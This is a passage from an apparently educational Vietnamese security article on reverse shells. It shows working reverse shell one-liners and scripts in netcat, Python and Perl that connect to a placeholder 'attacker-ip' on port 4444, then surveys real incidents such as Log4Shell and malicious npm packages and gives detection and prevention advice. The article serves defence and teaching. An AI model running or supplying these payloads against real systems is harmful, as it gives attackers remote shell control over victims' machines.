s\u1eed d\u1ee5ng ph\u01b0\u01a1ng ph\u00e1p thay th\u1ebf:<\/span><\/li>\n<\/ul>\n<pre><span style=\"font-weight: 400;\">rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2&gt;&amp;1|nc attacker-ip 4444 &gt;\/tmp\/f<\/span><\/pre>\n<h3><b>Python reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Python l\u00e0 m\u1ed9t ng\u00f4n ng\u1eef ph\u1ed5 bi\u1ebfn v\u00e0 m\u1ea1nh m\u1ebd, c\u0169ng c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng \u0111\u1ec3 t\u1ea1o m\u1ed9t reverse shell tr\u00ean h\u1ec7 th\u1ed1ng. V\u00ed d\u1ee5:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">import socket<\/span>\r\n\r\n<span style=\"font-weight: 400;\">import os<\/span>\r\n\r\n<span style=\"font-weight: 400;\"># T\u1ea1o socket k\u1ebft n\u1ed1i<\/span>\r\n\r\n<span style=\"font-weight: 400;\">s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<\/span>\r\n\r\n<span style=\"font-weight: 400;\"># K\u1ebft n\u1ed1i t\u1edbi m\u00e1y t\u1ea5n c\u00f4ng qua IP v\u00e0 c\u1ed5ng 4444<\/span>\r\n\r\n<span style=\"font-weight: 400;\">s.connect((\"attacker-ip\", 4444))<\/span>\r\n\r\n<span style=\"font-weight: 400;\"># Chuy\u1ec3n \u0111\u1ed5i c\u00e1c lu\u1ed3ng d\u1eef li\u1ec7u t\u1edbi k\u1ebft n\u1ed1i m\u1ea1ng<\/span>\r\n\r\n<span style=\"font-weight: 400;\">os.dup2(s.fileno(), 0)\u00a0 # \u0110\u1ea7u v\u00e0o<\/span>\r\n\r\n<span style=\"font-weight: 400;\">os.dup2(s.fileno(), 1)\u00a0 # \u0110\u1ea7u ra<\/span>\r\n\r\n<span style=\"font-weight: 400;\">os.dup2(s.fileno(), 2)\u00a0 # L\u1ed7i<\/span>\r\n\r\n<span style=\"font-weight: 400;\"># Ch\u1ea1y shell bash tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n<\/span>\r\n\r\n<span style=\"font-weight: 400;\">os.system(\"\/bin\/sh\")<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Ho\u1eb7c d\u1ea1ng m\u1ed9t d\u00f2ng th\u01b0\u1eddng \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"attacker-ip\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"\/bin\/sh\",\"-i\"])'<\/span><\/pre>\n<h3><b>Perl reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">V\u00ed d\u1ee5:\u00a0<\/span><\/p>\n<p>Kh\u1edfi t\u1ea1o listener tr\u00ean m\u00e1y t\u1ea5n c\u00f4ng:<\/p>\n<pre><span style=\"font-weight: 400;\">use IO::Socket;<\/span>\r\n\r\n<span style=\"font-weight: 400;\">$|=1;\u00a0 # B\u1ecf buffer khi xu\u1ea5t th\u00f4ng tin<\/span>\r\n\r\n<span style=\"font-weight: 400;\"># T\u1ea1o m\u1ed9t socket TCP \u0111\u1ec3 l\u1eafng nghe k\u1ebft n\u1ed1i \u0111\u1ebfn<\/span>\r\n\r\n<span style=\"font-weight: 400;\">$socket = new IO::Socket::INET (<\/span>\r\n\r\n<span style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0LocalHost =&gt; '0.0.0.0',\u00a0 # L\u1eafng nghe t\u1ea5t c\u1ea3 c\u00e1c \u0111\u1ecba ch\u1ec9 IP<\/span>\r\n\r\n<span style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0LocalPort =&gt; '4444',\u00a0 \u00a0 \u00a0 # C\u1ed5ng l\u1eafng nghe l\u00e0 4444<\/span>\r\n\r\n<span style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0Proto =&gt; 'tcp', \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 # Giao th\u1ee9c TCP<\/span>\r\n\r\n<span style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0Listen =&gt; 1,\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 # Cho ph\u00e9p 1 k\u1ebft n\u1ed1i ch\u1edd<\/span>\r\n\r\n<span style=\"font-weight: 400;\">\u00a0\u00a0\u00a0\u00a0Reuse =&gt; 1\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 # Cho ph\u00e9p t\u00e1i s\u1eed d\u1ee5ng \u0111\u1ecba ch\u1ec9 sau khi \u0111\u00f3ng<\/span>\r\n\r\n<span style=\"font-weight: 400;\">);<\/span><\/pre>\n<p>Ch\u1edd k\u1ebft n\u1ed1i t\u1eeb m\u00e1y n\u1ea1n nh\u00e2n:<\/p>\n<pre><span style=\"font-weight: 400;\">$new_socket = $socket-&gt;accept();\u00a0 # Ch\u1ea5p nh\u1eadn k\u1ebft n\u1ed1i t\u1eeb m\u00e1y n\u1ea1n nh\u00e2n v\u00e0 g\u00e1n k\u1ebft n\u1ed1i n\u00e0y v\u00e0o bi\u1ebfn $new_socket<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Sau khi k\u1ebft n\u1ed1i th\u00e0nh c\u00f4ng, m\u00e1y t\u1ea5n c\u00f4ng s\u1ebd m\u1edf m\u1ed9t shell l\u1ec7nh (<\/span><span style=\"font-weight: 400;\">\/bin\/sh<\/span><span style=\"font-weight: 400;\">) tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n \u0111\u1ec3 th\u1ef1c thi c\u00e1c l\u1ec7nh:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">system(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");\u00a0 # M\u1edf shell Bash v\u00e0 k\u1ebft n\u1ed1i l\u1ea1i v\u1edbi m\u00e1y t\u1ea5n c\u00f4ng<\/span><\/pre>\n<p><span style=\"font-weight: 400;\">Cu\u1ed1i c\u00f9ng, sau khi th\u1ef1c thi c\u00e1c l\u1ec7nh, k\u1ebb t\u1ea5n c\u00f4ng s\u1ebd \u0111\u00f3ng k\u1ebft n\u1ed1i v\u1edbi l\u1ec7nh:<\/span><\/p>\n<pre><span style=\"font-weight: 400;\">$new_socket-&gt;close();\u00a0 # \u0110\u00f3ng k\u1ebft n\u1ed1i<\/span><\/pre>\n<h2><span class=\"ez-toc-section\" id=\"Mot_so_tinh_huong_thuc_te_lien_quan_den_reverse_shell\"><\/span><b>M\u1ed9t s\u1ed1 t\u00ecnh hu\u1ed1ng th\u1ef1c t\u1ebf li\u00ean quan \u0111\u1ebfn reverse shell<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>1. L\u1ed7 h\u1ed5ng #BrokenSesame tr\u00ean c\u01a1 s\u1edf d\u1eef li\u1ec7u PostgreSQL c\u1ee7a Alibaba<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Trong m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng g\u1ea7n \u0111\u00e2y, nh\u00f3m nghi\u00ean c\u1ee9u Wiz \u0111\u00e3 ph\u00e1t hi\u1ec7n l\u1ed7 h\u1ed5ng #BrokenSesame tr\u00ean c\u01a1 s\u1edf d\u1eef li\u1ec7u PostgreSQL c\u1ee7a Alibaba Cloud. L\u1ed7 h\u1ed5ng n\u00e0y x\u1ea3y ra do s\u1ef1 thi\u1ebfu t\u00e1ch bi\u1ec7t gi\u1eefa c\u00e1c container v\u00e0 quy\u1ec1n ghi kh\u00f4ng h\u1ee3p l\u00fd v\u00e0o registry ri\u00eang, khi\u1ebfn k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 x\u00e2m nh\u1eadp v\u00e0o h\u1ec7 th\u1ed1ng.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">N\u1ebfu khai th\u00e1c th\u00e0nh c\u00f4ng, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 ph\u00e1t t\u00e1n c\u00e1c g\u00f3i ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i, bao g\u1ed3m c\u00e1c reverse shell, l\u00e0m th\u00e2m nh\u1eadp v\u00e0o chu\u1ed7i cung \u1ee9ng c\u1ee7a Alibaba v\u00e0 l\u00e0m t\u1ed5n h\u1ea1i \u0111\u1ebfn c\u00e1c kh\u00e1ch h\u00e0ng c\u1ee7a h\u1ecd. C\u1ee5 th\u1ec3, l\u1ed7 h\u1ed5ng cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng ti\u00eam c\u00e1c script \u0111\u1ed9c h\u1ea1i v\u00e0o h\u1ec7 th\u1ed1ng v\u00e0 thi\u1ebft l\u1eadp k\u1ebft n\u1ed1i reverse shell \u0111\u1ec3 ki\u1ec3m so\u00e1t t\u1eeb xa m\u00e1y ch\u1ee7 PostgreSQL, t\u1eeb \u0111\u00f3 c\u00f3 th\u1ec3 m\u1edf r\u1ed9ng t\u1ea5n c\u00f4ng sang c\u00e1c h\u1ec7 th\u1ed1ng kh\u00e1c trong m\u1ea1ng n\u1ed9i b\u1ed9.<\/span><\/p>\n<h3><b>2. L\u1ed7 h\u1ed5ng Hell\u2019s Keychain trong c\u01a1 s\u1edf d\u1eef li\u1ec7u PostgreSQL c\u1ee7a IBM Cloud<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">C\u0169ng t\u01b0\u01a1ng t\u1ef1 nh\u01b0 Alibaba, nh\u00f3m Wiz \u0111\u00e3 ph\u00e1t hi\u1ec7n l\u1ed7 h\u1ed5ng &#8220;Hell\u2019s Keychain&#8221; trong c\u01a1 s\u1edf d\u1eef li\u1ec7u PostgreSQL c\u1ee7a IBM Cloud. L\u1ed7 h\u1ed5ng n\u00e0y cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng leo thang quy\u1ec1n h\u1ea1n v\u00e0 truy c\u1eadp v\u00e0o d\u1eef li\u1ec7u quan tr\u1ecdng.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">L\u1ed7 h\u1ed5ng n\u00e0y c\u00f3 th\u1ec3 d\u1eabn \u0111\u1ebfn vi\u1ec7c r\u00f2 r\u1ec9 th\u00f4ng tin \u0111\u0103ng nh\u1eadp, m\u1eadt kh\u1ea9u v\u00e0 quy\u1ec1n truy c\u1eadp v\u00e0o c\u00e1c h\u1ec7 th\u1ed1ng n\u1ed9i b\u1ed9, d\u1ec5 d\u00e0ng d\u1eabn \u0111\u1ebfn m\u1ed9t cu\u1ed9c t\u1ea5n c\u00f4ng chu\u1ed7i cung \u1ee9ng qua reverse shell. K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 thi\u1ebft l\u1eadp m\u1ed9t reverse shell \u0111\u1ec3 duy tr\u00ec quy\u1ec1n truy c\u1eadp li\u00ean t\u1ee5c v\u00e0o h\u1ec7 th\u1ed1ng, ngay c\u1ea3 sau khi c\u00e1c k\u1ebft n\u1ed1i ban \u0111\u1ea7u \u0111\u00e3 b\u1ecb ph\u00e1t hi\u1ec7n v\u00e0 \u0111\u00f3ng l\u1ea1i. \u0110\u1eb7c bi\u1ec7t nghi\u00eam tr\u1ecdng l\u00e0 c\u00e1c th\u00f4ng tin x\u00e1c th\u1ef1c \u0111\u00e1nh c\u1eafp \u0111\u01b0\u1ee3c c\u00f3 th\u1ec3 b\u1ecb s\u1eed d\u1ee5ng \u0111\u1ec3 t\u1ea1o c\u00e1c k\u1ebft n\u1ed1i reverse shell m\u1edbi v\u00e0o c\u00e1c h\u1ec7 th\u1ed1ng kh\u00e1c trong m\u1ea1ng.<\/span><\/p>\n<h3><b>3. L\u1ed7 h\u1ed5ng reverse shell qua npm<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">M\u1ed9t v\u00ed d\u1ee5 kh\u00e1c x\u1ea3y ra v\u00e0o th\u00e1ng 10 n\u0103m 2023, khi c\u00e1c nh\u00e0 nghi\u00ean c\u1ee9u b\u1ea3o m\u1eadt ph\u00e1t hi\u1ec7n 48 g\u00f3i ph\u1ea7n m\u1ec1m \u0111\u1ed9c h\u1ea1i \u0111\u01b0\u1ee3c \u0111\u0103ng t\u1ea3i tr\u00ean npm. Nh\u1eefng g\u00f3i n\u00e0y \u0111\u01b0\u1ee3c \u0111\u00f3ng g\u00f3i d\u01b0\u1edbi d\u1ea1ng c\u00e1c t\u1ec7p package.json, c\u00f3 ch\u1ee9a m\u00e3 \u0111\u1ed9c v\u1edbi hook c\u00e0i \u0111\u1eb7t k\u00edch ho\u1ea1t c\u00e1c l\u1ec7nh reverse shell. Khi g\u00f3i ph\u1ea7n m\u1ec1m \u0111\u01b0\u1ee3c c\u00e0i \u0111\u1eb7t tr\u00ean h\u1ec7 th\u1ed1ng, k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 t\u1eadn d\u1ee5ng k\u1ebft n\u1ed1i n\u00e0y \u0111\u1ec3 l\u1ea5y quy\u1ec1n \u0111i\u1ec1u khi\u1ec3n v\u00e0 truy c\u1eadp v\u00e0o c\u00e1c h\u1ec7 th\u1ed1ng m\u1ea1ng c\u1ee7a n\u1ea1n nh\u00e2n.<\/span><\/p>\n<h3><b>4. Phishing v\u00e0 l\u1ed7 h\u1ed5ng m\u00e3 h\u00f3a trong c\u00e1c \u1ee9ng d\u1ee5ng web<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Trong m\u1ed9t s\u1ed1 cu\u1ed9c t\u1ea5n c\u00f4ng, k\u1ebb t\u1ea5n c\u00f4ng khai th\u00e1c l\u1ed7 h\u1ed5ng m\u00e3 h\u00f3a trong c\u00e1c \u1ee9ng d\u1ee5ng web ho\u1eb7c l\u1eeba \u0111\u1ea3o ng\u01b0\u1eddi d\u00f9ng qua email phishing. M\u1ee5c ti\u00eau c\u1ee7a c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng n\u00e0y l\u00e0 \u0111\u1ec3 l\u1eeba n\u1ea1n nh\u00e2n t\u1ea3i l\u00ean m\u00e3 \u0111\u1ed9c d\u01b0\u1edbi d\u1ea1ng c\u00e1c t\u1ec7p tin v\u00f4 h\u1ea1i nh\u01b0 \u1ea3nh ho\u1eb7c t\u00e0i li\u1ec7u, t\u1eeb \u0111\u00f3 k\u00edch ho\u1ea1t reverse shell khi th\u1ef1c thi m\u00e3 \u0111\u1ed9c. \u0110\u00e2y l\u00e0 m\u1ed9t trong nh\u1eefng ph\u01b0\u01a1ng th\u1ee9c ph\u1ed5 bi\u1ebfn gi\u00fap k\u1ebb t\u1ea5n c\u00f4ng x\u00e2m nh\u1eadp v\u00e0o m\u1ea1ng c\u1ee7a n\u1ea1n nh\u00e2n v\u00e0 ki\u1ec3m so\u00e1t c\u00e1c h\u1ec7 th\u1ed1ng.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">M\u1ed9t k\u1ef9 thu\u1eadt ph\u1ed5 bi\u1ebfn l\u00e0 s\u1eed d\u1ee5ng c\u00e1c t\u1ec7p macros trong Microsoft Office ho\u1eb7c c\u00e1c t\u1ec7p PDF c\u00f3 ch\u1ee9a m\u00e3 JavaScript \u0111\u1ed9c h\u1ea1i. Khi ng\u01b0\u1eddi d\u00f9ng m\u1edf c\u00e1c t\u1ec7p n\u00e0y v\u00e0 cho ph\u00e9p th\u1ef1c thi n\u1ed9i dung \u0111\u1ed9ng, ch\u00fang s\u1ebd \u00e2m th\u1ea7m thi\u1ebft l\u1eadp k\u1ebft n\u1ed1i reverse shell \u0111\u1ebfn m\u00e1y c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng.<\/span><\/p>\n<h3><b>5. L\u1ed7 h\u1ed5ng Log4Shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">M\u1ed9t trong nh\u1eefng l\u1ed7 h\u1ed5ng nghi\u00eam tr\u1ecdng nh\u1ea5t trong nh\u1eefng n\u0103m g\u1ea7n \u0111\u00e2y l\u00e0 Log4Shell (CVE-2021-44228) \u1ea3nh h\u01b0\u1edfng \u0111\u1ebfn th\u01b0 vi\u1ec7n Log4j c\u1ee7a Java. L\u1ed7 h\u1ed5ng n\u00e0y cho ph\u00e9p k\u1ebb t\u1ea5n c\u00f4ng th\u1ef1c thi m\u00e3 t\u1eeb xa b\u1eb1ng c\u00e1ch g\u1eedi m\u1ed9t chu\u1ed7i \u0111\u1eb7c bi\u1ec7t \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 k\u00edch ho\u1ea1t JNDI lookup.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">K\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 l\u1ee3i d\u1ee5ng \u0111i\u1ec1u n\u00e0y \u0111\u1ec3 t\u1ea1o c\u00e1c k\u1ebft n\u1ed1i reverse shell \u0111\u1ebfn m\u00e1y ch\u1ee7 \u0111i\u1ec1u khi\u1ec3n c\u1ee7a h\u1ecd. \u0110\u00e1ng ch\u00fa \u00fd, l\u1ed7 h\u1ed5ng n\u00e0y \u1ea3nh h\u01b0\u1edfng \u0111\u1ebfn h\u00e0ng tri\u1ec7u \u1ee9ng d\u1ee5ng v\u00e0 d\u1ecbch v\u1ee5 tr\u00ean to\u00e0n th\u1ebf gi\u1edbi, v\u00ec Log4j l\u00e0 m\u1ed9t th\u01b0 vi\u1ec7n ghi log ph\u1ed5 bi\u1ebfn \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng r\u1ed9ng r\u00e3i trong c\u00e1c \u1ee9ng d\u1ee5ng Java.<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Cach_phat_hien_va_phong_chong_reverse_shell\"><\/span><b>C\u00e1ch ph\u00e1t hi\u1ec7n v\u00e0 ph\u00f2ng ch\u1ed1ng reverse shell<\/b><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><b>C\u00e1ch ph\u00e1t hi\u1ec7n reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Vi\u1ec7c ph\u00e1t hi\u1ec7n reverse shell c\u00f3 th\u1ec3 g\u1eb7p kh\u00f3 kh\u0103n v\u00ec k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 m\u00e3 h\u00f3a k\u1ebft n\u1ed1i v\u00e0 s\u1eed d\u1ee5ng nhi\u1ec1u c\u00f4ng c\u1ee5 kh\u00e1c nhau \u0111\u1ec3 th\u1ef1c hi\u1ec7n h\u00e0nh vi n\u00e0y. Tuy nhi\u00ean, c\u00e1c b\u01b0\u1edbc d\u01b0\u1edbi \u0111\u00e2y c\u00f3 th\u1ec3 gi\u00fap ph\u00e1t hi\u1ec7n s\u1ef1 hi\u1ec7n di\u1ec7n c\u1ee7a m\u1ed9t reverse shell:<\/span><\/p>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Ki\u1ec3m tra k\u1ebft n\u1ed1i \u0111\u1ea7u ra<\/b><span style=\"font-weight: 400;\">: H\u1ea7u h\u1ebft c\u00e1c reverse shell k\u1ebft n\u1ed1i t\u1eeb m\u00e1y n\u1ea1n nh\u00e2n t\u1edbi m\u00e1y c\u1ee7a k\u1ebb t\u1ea5n c\u00f4ng. Do \u0111\u00f3, vi\u1ec7c ki\u1ec3m tra t\u1ea5t c\u1ea3 c\u00e1c k\u1ebft n\u1ed1i \u0111\u1ea7u ra t\u1eeb m\u00e1y n\u1ea1n nh\u00e2n c\u00f3 th\u1ec3 gi\u00fap ph\u00e1t hi\u1ec7n c\u00e1c k\u1ebft n\u1ed1i b\u1ea5t th\u01b0\u1eddng. C\u00e1c h\u1ec7 th\u1ed1ng t\u01b0\u1eddng l\u1eeda ho\u1eb7c IDS\/IPS c\u00f3 th\u1ec3 gi\u00fap nh\u1eadn di\u1ec7n c\u00e1c k\u1ebft n\u1ed1i \u0111\u1ea7u ra kh\u00f4ng x\u00e1c \u0111\u1ecbnh. \u0110\u1eb7c bi\u1ec7t ch\u00fa \u00fd \u0111\u1ebfn c\u00e1c k\u1ebft n\u1ed1i k\u00e9o d\u00e0i v\u00e0 kh\u00f4ng th\u01b0\u1eddng xuy\u00ean \u0111\u1ebfn c\u00e1c \u0111\u1ecba ch\u1ec9 IP kh\u00f4ng ph\u1ed5 bi\u1ebfn.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Gi\u00e1m s\u00e1t l\u01b0u l\u01b0\u1ee3ng m\u1ea1ng<\/b><span style=\"font-weight: 400;\">: M\u1ed9t ph\u01b0\u01a1ng ph\u00e1p ph\u1ed5 bi\u1ebfn \u0111\u1ec3 ph\u00e1t hi\u1ec7n reverse shell l\u00e0 gi\u00e1m s\u00e1t t\u1ea5t c\u1ea3 l\u01b0u l\u01b0\u1ee3ng m\u1ea1ng ra v\u00e0o h\u1ec7 th\u1ed1ng. L\u01b0u \u00fd r\u1eb1ng c\u00e1c k\u1ebft n\u1ed1i t\u1edbi c\u00e1c c\u1ed5ng l\u1ea1 (ho\u1eb7c kh\u00f4ng b\u00ecnh th\u01b0\u1eddng) nh\u01b0 c\u1ed5ng 80 ho\u1eb7c 443 (c\u1ed5ng HTTP\/HTTPS) c\u00f3 th\u1ec3 l\u00e0 d\u1ea5u hi\u1ec7u c\u1ee7a m\u1ed9t reverse shell. Ph\u00e2n t\u00edch g\u00f3i tin s\u00e2u (Deep Packet Inspection) c\u00f3 th\u1ec3 gi\u00fap ph\u00e1t hi\u1ec7n c\u00e1c m\u1eabu l\u01b0u l\u01b0\u1ee3ng \u0111\u1eb7c tr\u01b0ng c\u1ee7a shell commands trong c\u00e1c giao th\u1ee9c b\u00ecnh th\u01b0\u1eddng.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Qu\u1ea3n l\u00fd v\u00e0 ki\u1ec3m tra c\u00e1c ti\u1ebfn tr\u00ecnh (Process)<\/b><span style=\"font-weight: 400;\">: C\u00e1c reverse shell th\u01b0\u1eddng y\u00eau c\u1ea7u c\u00e1c ti\u1ebfn tr\u00ecnh shell \u0111\u01b0\u1ee3c kh\u1edfi ch\u1ea1y tr\u00ean m\u00e1y n\u1ea1n nh\u00e2n. Ki\u1ec3m tra c\u00e1c ti\u1ebfn tr\u00ecnh v\u00e0 script \u0111ang ch\u1ea1y trong h\u1ec7 th\u1ed1ng c\u00f3 th\u1ec3 gi\u00fap ph\u00e1t hi\u1ec7n c\u00e1c ti\u1ebfn tr\u00ecnh b\u1ea5t th\u01b0\u1eddng ho\u1eb7c ch\u01b0a \u0111\u01b0\u1ee3c ph\u00ea duy\u1ec7t. Ch\u00fa \u00fd \u0111\u1eb7c bi\u1ec7t \u0111\u1ebfn c\u00e1c ti\u1ebfn tr\u00ecnh con b\u1ea5t th\u01b0\u1eddng c\u1ee7a c\u00e1c \u1ee9ng d\u1ee5ng web nh\u01b0 www-data ho\u1eb7c c\u00e1c quy tr\u00ecnh Apache\/Nginx \u0111ang ch\u1ea1y shell commands.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>S\u1eed d\u1ee5ng c\u00f4ng c\u1ee5 ph\u00e1t hi\u1ec7n h\u00e0nh vi (Behavioral Detection)<\/b><span style=\"font-weight: 400;\">: C\u00e1c c\u00f4ng c\u1ee5 ph\u00e1t hi\u1ec7n h\u00e0nh vi c\u00f3 th\u1ec3 gi\u00fap nh\u1eadn di\u1ec7n h\u00e0nh \u0111\u1ed9ng kh\u00f4ng b\u00ecnh th\u01b0\u1eddng c\u1ee7a h\u1ec7 th\u1ed1ng, ch\u1eb3ng h\u1ea1n nh\u01b0 k\u1ebft n\u1ed1i \u0111\u1ebfn m\u1ed9t m\u00e1y ch\u1ee7 b\u00ean ngo\u00e0i v\u00e0 th\u1ef1c thi c\u00e1c l\u1ec7nh shell.<\/span><\/li>\n<\/ol>\n<h3><b>C\u00e1ch ph\u00f2ng ch\u1ed1ng reverse shell<\/b><\/h3>\n<p><span style=\"font-weight: 400;\">Ph\u00f2ng ch\u1ed1ng reverse shell ch\u1ee7 y\u1ebfu t\u1eadp trung v\u00e0o vi\u1ec7c h\u1ea1n ch\u1ebf c\u00e1c k\u1ebft n\u1ed1i kh\u00f4ng mong mu\u1ed1n t\u1eeb m\u00e1y n\u1ea1n nh\u00e2n t\u1edbi m\u00e1y t\u1ea5n c\u00f4ng, c\u0169ng nh\u01b0 gi\u1ea3m thi\u1ec3u c\u00e1c c\u01a1 h\u1ed9i t\u1ea5n c\u00f4ng:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>C\u1ea5u h\u00ecnh t\u01b0\u1eddng l\u1eeda (Firewall)<\/b><span style=\"font-weight: 400;\">: T\u01b0\u1eddng l\u1eeda c\u00f3 th\u1ec3 h\u1ea1n ch\u1ebf c\u00e1c k\u1ebft n\u1ed1i \u0111\u1ea7u ra, nh\u01b0ng ch\u1ec9 hi\u1ec7u qu\u1ea3 khi \u0111\u01b0\u1ee3c c\u1ea5u h\u00ecnh ch\u00ednh x\u00e1c. Tuy nhi\u00ean, \u0111\u1ed1i v\u1edbi c\u00e1c m\u00e1y ch\u1ee7 chuy\u00ean d\u1ee5ng, vi\u1ec7c ki\u1ec3m so\u00e1t c\u00e1c k\u1ebft n\u1ed1i \u0111\u1ea7u ra c\u00f3 th\u1ec3 l\u00e0 m\u1ed9t c\u00e1ch ph\u00f2ng ng\u1eeba hi\u1ec7u qu\u1ea3. H\u00e3y ch\u1eafc ch\u1eafn r\u1eb1ng t\u1ea5t c\u1ea3 c\u00e1c k\u1ebft n\u1ed1i t\u1edbi c\u1ed5ng kh\u00f4ng c\u1ea7n thi\u1ebft \u0111\u01b0\u1ee3c ch\u1eb7n v\u00e0 ch\u1ec9 cho ph\u00e9p c\u00e1c c\u1ed5ng x\u00e1c \u0111\u1ecbnh r\u00f5 r\u00e0ng nh\u01b0 HTTP (80) ho\u1eb7c HTTPS (443). N\u00ean thi\u1ebft l\u1eadp danh s\u00e1ch tr\u1eafng (whitelist) cho c\u00e1c k\u1ebft n\u1ed1i \u0111\u1ea7u ra thay v\u00ec ch\u1ec9 ch\u1eb7n c\u00e1c c\u1ed5ng \u0111\u00e1ng ng\u1edd.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>S\u1eed d\u1ee5ng IDS\/IPS (H\u1ec7 th\u1ed1ng ph\u00e1t hi\u1ec7n x\u00e2m nh\u1eadp)<\/b><span style=\"font-weight: 400;\">: C\u00e1c h\u1ec7 th\u1ed1ng ph\u00e1t hi\u1ec7n x\u00e2m nh\u1eadp (IDS) c\u00f3 th\u1ec3 gi\u00e1m s\u00e1t m\u1ea1ng v\u00e0 nh\u1eadn di\u1ec7n c\u00e1c m\u1eabu giao ti\u1ebfp b\u1ea5t th\u01b0\u1eddng, ch\u1eb3ng h\u1ea1n nh\u01b0 reverse shell. N\u1ebfu c\u00f3 b\u1ea5t k\u1ef3 l\u01b0u l\u01b0\u1ee3ng n\u00e0o kh\u00f4ng x\u00e1c \u0111\u1ecbnh, h\u1ec7 th\u1ed1ng c\u00f3 th\u1ec3 c\u1ea3nh b\u00e1o v\u00e0 ng\u1eebng k\u1ebft n\u1ed1i.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>C\u1eadp nh\u1eadt v\u00e0 v\u00e1 l\u1ed7i h\u1ec7 th\u1ed1ng (Patch Management)<\/b><span style=\"font-weight: 400;\">: C\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng reverse shell th\u01b0\u1eddng d\u1ef1a v\u00e0o c\u00e1c l\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt (v\u00ed d\u1ee5 nh\u01b0 l\u1ed7 h\u1ed5ng m\u00e3 ti\u00eam v\u00e0o). \u0110\u1ec3 ph\u00f2ng ng\u1eeba, h\u00e3y \u0111\u1ea3m b\u1ea3o h\u1ec7 th\u1ed1ng c\u1ee7a b\u1ea1n lu\u00f4n \u0111\u01b0\u1ee3c c\u1eadp nh\u1eadt c\u00e1c b\u1ea3n v\u00e1 b\u1ea3o m\u1eadt m\u1edbi nh\u1ea5t, \u0111\u1eb7c bi\u1ec7t \u0111\u1ed1i v\u1edbi c\u00e1c \u1ee9ng d\u1ee5ng web v\u00e0 d\u1ecbch v\u1ee5 \u0111\u1ea7u cu\u1ed1i.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Gi\u1edbi h\u1ea1n quy\u1ec1n truy c\u1eadp v\u00e0 s\u1eed d\u1ee5ng quy\u1ec1n h\u1ea1n t\u1ed1i thi\u1ec3u (Principle of Least Privilege)<\/b><span style=\"font-weight: 400;\">: Kh\u00f4ng bao gi\u1edd ch\u1ea1y \u1ee9ng d\u1ee5ng ho\u1eb7c shell v\u1edbi quy\u1ec1n &#8220;root&#8221; tr\u00ean m\u00e1y ch\u1ee7. T\u1ea1o t\u00e0i kho\u1ea3n ng\u01b0\u1eddi d\u00f9ng v\u1edbi quy\u1ec1n h\u1ea1n h\u1ea1n ch\u1ebf cho m\u1ed7i \u1ee9ng d\u1ee5ng. C\u00e1ch n\u00e0y s\u1ebd l\u00e0m gi\u1ea3m kh\u1ea3 n\u0103ng k\u1ebb t\u1ea5n c\u00f4ng c\u00f3 th\u1ec3 chi\u1ebfm quy\u1ec1n 